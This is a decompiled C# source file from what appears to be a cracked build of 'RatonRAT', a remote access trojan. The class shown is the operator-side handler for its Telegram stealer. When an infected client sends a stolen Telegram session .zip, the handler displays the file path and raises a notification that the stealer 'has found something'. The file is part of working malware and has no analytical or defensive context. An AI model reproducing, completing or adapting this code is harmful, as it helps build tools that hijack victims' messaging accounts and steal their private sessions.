36 lines
1.4 KiB
C#
36 lines
1.4 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: Server.Handlers.HandleTelegram
|
|
// Assembly: Raton, Version=0.4.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 36C4E416-7F8D-4D23-930F-B5CCB0D810E7
|
|
// Assembly location: C:\Users\user\Desktop\v3.8.0 Deluxe Plugins (v4.0.0) cracked\Raton.exe
|
|
|
|
using Raton.Forms.ClientForms.Stealers;
|
|
using Raton.Windows;
|
|
using Server.Connection;
|
|
using Stuff;
|
|
using System;
|
|
using System.Windows.Forms;
|
|
|
|
#nullable disable
|
|
namespace Server.Handlers;
|
|
|
|
internal class HandleTelegram
|
|
{
|
|
public HandleTelegram(SillyClient client, Unpack rip2pac)
|
|
{
|
|
ratonTelegram ratonTelegram = (ratonTelegram) Application.OpenForms["Telegram | Client ID: " + rip2pac.GetAsString("UID")];
|
|
if (ratonTelegram == null)
|
|
return;
|
|
if (ratonTelegram.SillyClient == null)
|
|
ratonTelegram.SillyClient = client;
|
|
ratonTelegram.Invoke((Delegate) (() =>
|
|
{
|
|
ratonTelegram.label1.Text = "Got the telegram session .zip!";
|
|
ratonTelegram.label1.ForeColor = System.Drawing.Color.LightGreen;
|
|
ratonTelegram.textBox1.Text = rip2pac.GetAsString("Path");
|
|
ratonTelegram.button1.Enabled = true;
|
|
Notification.Show($"RatonRAT • {rip2pac.GetAsString("UID")}\nTelegram stealer has found something", "\uE946", new System.Windows.Media.Color?(System.Windows.Media.Color.FromArgb(byte.MaxValue, byte.MaxValue, (byte) 237, (byte) 41)));
|
|
}));
|
|
}
|
|
}
|